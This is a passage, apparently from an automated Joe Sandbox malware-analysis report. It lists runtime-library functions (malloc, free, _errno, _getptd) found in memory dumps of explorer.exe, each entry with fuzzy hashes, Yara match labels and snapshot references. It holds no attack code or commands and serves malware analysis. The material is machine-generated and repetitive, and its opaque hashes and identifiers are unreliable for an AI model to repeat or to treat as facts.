                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 3825b951a884695e097fc24b32cc13d3420eb51477a0d16b6fb4de5ad55a4833
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7414C31518B5E8BCBB8AB9D80602B673D0FB54391B9C032FE6D6C7194EB24CC42DB81
                                                                                                                                                                                                                        Function 0DFC3450 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _malloc_crt.LIBCMT ref: 0DFC3479
                                                                                                                                                                                                                          • Part of subcall function 0DFC04F8: malloc.LIBCMT ref: 0DFC0523
                                                                                                                                                                                                                          • Part of subcall function 0DFC04F8: Sleep.KERNEL32 ref: 0DFC0536
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DFC357A
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DFC3596
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2523592665-0
                                                                                                                                                                                                                        • Opcode ID: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction ID: a0ec185729283a9da7c42c48bce3dc9a5bf55e3cff6f341411be7292151746d5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9351CF36704B4293EB21EF1AEA4036A33A4F788BA8F45C1299F4D47B10EF38D4768740
                                                                                                                                                                                                                        Function 0E123450 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _malloc_crt.LIBCMT ref: 0E123479
                                                                                                                                                                                                                          • Part of subcall function 0E1204F8: malloc.LIBCMT ref: 0E120523
                                                                                                                                                                                                                          • Part of subcall function 0E1204F8: Sleep.KERNEL32 ref: 0E120536
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E12357A
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E123596
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2523592665-0
                                                                                                                                                                                                                        • Opcode ID: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction ID: 43bfd61e7eacf0e0080de19c7990de0f1617e954b164cffa52f1e727a2e1f297
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75519932301B5193EB25DB26ED9035A73A4F788B98F5446399E6D07B10EF3CC9B68744
                                                                                                                                                                                                                        Function 0FF63450 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _malloc_crt.LIBCMT ref: 0FF63479
                                                                                                                                                                                                                          • Part of subcall function 0FF604F8: malloc.LIBCMT ref: 0FF60523
                                                                                                                                                                                                                          • Part of subcall function 0FF604F8: Sleep.KERNEL32 ref: 0FF60536
                                                                                                                                                                                                                        • free.LIBCMT ref: 0FF6357A
                                                                                                                                                                                                                        • free.LIBCMT ref: 0FF63596
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2523592665-0
                                                                                                                                                                                                                        • Opcode ID: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction ID: 1a1195afae469592b6bf64f01ef81a19f9f798988fa32f519e60946213657c6c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2951B236705B4193EB20EF16E98076A73A4FB88B98F584235DF4D47B12EF38D4668744
                                                                                                                                                                                                                        Function 0DEF73CD Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEF73F3
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEF73E8
                                                                                                                                                                                                                          • Part of subcall function 0DEEF0F5: _getptd_noexit.LIBCMT ref: 0DEEF0F9
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DEF7472
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEF7483
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEF748E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: 9493a502638ef36096f7c4dd4e8d0606dbfdec080f7f6f7f6e72ca44778ace5e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25417B30518B1E8FCB25FF1884502B6B7E0FB94329BA5526EE6DAD7194EF34C482C341
                                                                                                                                                                                                                        Function 082473CD Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 082473F3
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 082473E8
                                                                                                                                                                                                                          • Part of subcall function 0823F0F5: _getptd_noexit.LIBCMT ref: 0823F0F9
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 08247472
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 08247483
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0824748E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: 01a26e0c69c83ce7d0bedd7e69ba3fdd9354a2db392884a8dcfe46858de39600
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B241F734534A5F8FCB2CAB6984542B577E0FB54323B94526EE4A6CB194EB34C483C761
                                                                                                                                                                                                                        Function 0E0A73CD Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0A73F3
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0A73E8
                                                                                                                                                                                                                          • Part of subcall function 0E09F0F5: _getptd_noexit.LIBCMT ref: 0E09F0F9
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E0A7472
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0A7483
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0A748E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: 80b68dbe9bad6367c9fdccbab3ba30668951099dac928650481486985181625c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9413831518A1E4BCB64BBA984602B677E0FB50361B9C862FE5D6C7194EB28CC82D341
                                                                                                                                                                                                                        Function 0DFCBEA0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFCBECB
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFCBEC0
                                                                                                                                                                                                                          • Part of subcall function 0DFBF7C0: _getptd_noexit.LIBCMT ref: 0DFBF7C4
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFCBF6E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFCBF79
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 46ef1a0562560f44b9395a3755c722fc2ea46cf7ffabfe3cdcbd27a990bd860f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5641367AE003D781DB249B6A97422B9B360FB40BD5F98E11EEB8947B84D738C271C700
                                                                                                                                                                                                                        Function 0E12BEA0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E12BECB
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E12BEC0
                                                                                                                                                                                                                          • Part of subcall function 0E11F7C0: _getptd_noexit.LIBCMT ref: 0E11F7C4
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E12BF6E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E12BF79
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 1fae0eedea13e7934395aa5d40c09af33f5087a252c2e86b9cf16e868cc2ad13
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE413776A143B581DF249B229950ABEB3A0FB40BD4FA8413EDF8547684D738CDE1C748
                                                                                                                                                                                                                        Function 0FF6BEA0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF6BECB
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF6BEC0
                                                                                                                                                                                                                          • Part of subcall function 0FF5F7C0: _getptd_noexit.LIBCMT ref: 0FF5F7C4
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF6BF6E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF6BF79
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 8b433d46a7c6863b17be1eac8004dabb6390a27a238827a7df8dac130a9b1418
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9141D372E1039681DB249B6195402B9B360FF90BD5FC84216EFD5D7B96DF38E2529B00
                                                                                                                                                                                                                        Function 0DFC7A98 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFC7ABE
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFC7AB3
                                                                                                                                                                                                                          • Part of subcall function 0DFBF7C0: _getptd_noexit.LIBCMT ref: 0DFBF7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DFC7B3D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFC7B4E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFC7B59
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: 78646bb7def22894f6f68c8e199dc15ce9c06e0d689ffa32dd8aa3153b83b65d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC312E76E183A382CB24BB1EDA501B97360E750BE5B94D12ED7D90B68CD728C971CB10
                                                                                                                                                                                                                        Function 0E127A98 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E127ABE
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E127AB3
                                                                                                                                                                                                                          • Part of subcall function 0E11F7C0: _getptd_noexit.LIBCMT ref: 0E11F7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E127B3D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E127B4E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E127B59
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: dd72cc2eb182a2100d2e92766020ace7c20ef760ed039be57ed5d14d186a1a2d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1031EA726142B182DF24AB16DD601BB73A1F740BA5BA8413FEB9507AC8D729CDF1C700
                                                                                                                                                                                                                        Function 0FF67A98 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF67ABE
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF67AB3
                                                                                                                                                                                                                          • Part of subcall function 0FF5F7C0: _getptd_noexit.LIBCMT ref: 0FF5F7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0FF67B3D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF67B4E
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF67B59
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction ID: ceee55006db3de5b5e46def32512ef2a26fa921cd65bafa126cdc8a0c9353475
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781587bc65f450609611608c33360a0df43bce7c93742b5b28682848a5f0c0de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2313973E143A182CB24BB2294501BD73A0EF44FE9BD48226EBD54B6AEEF2CD551D700
                                                                                                                                                                                                                        Function 0DEF427C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DEF42A7
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DEF4331
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DEF4284
                                                                                                                                                                                                                          • Part of subcall function 0DEF21D1: _getptd_noexit.LIBCMT ref: 0DEF21D7
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DEF4336
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DEF4342
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: 1c416f0777dd2303c47883f76be989f2e67be4c1c154e27dd8b0520332ca4580
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3318C70218B058FDB34EF58C491B6AB3E1FB98324F51155DD68AD3251DB31E842CB82
                                                                                                                                                                                                                        Function 0824427C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 082442A7
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 08244331
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 08244284
                                                                                                                                                                                                                          • Part of subcall function 082421D1: _getptd_noexit.LIBCMT ref: 082421D7
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 08244336
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 08244342
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: 44f8c629456bf507e8cf922ef7c8d535af27db167ba82b2579fb1e8248cc275b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B317874228B05CFC738EF58C491B6AB7E1FB98326F51155DD48A83251DB31E883CB92
                                                                                                                                                                                                                        Function 0E0A427C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E0A42A7
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E0A4331
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E0A4284
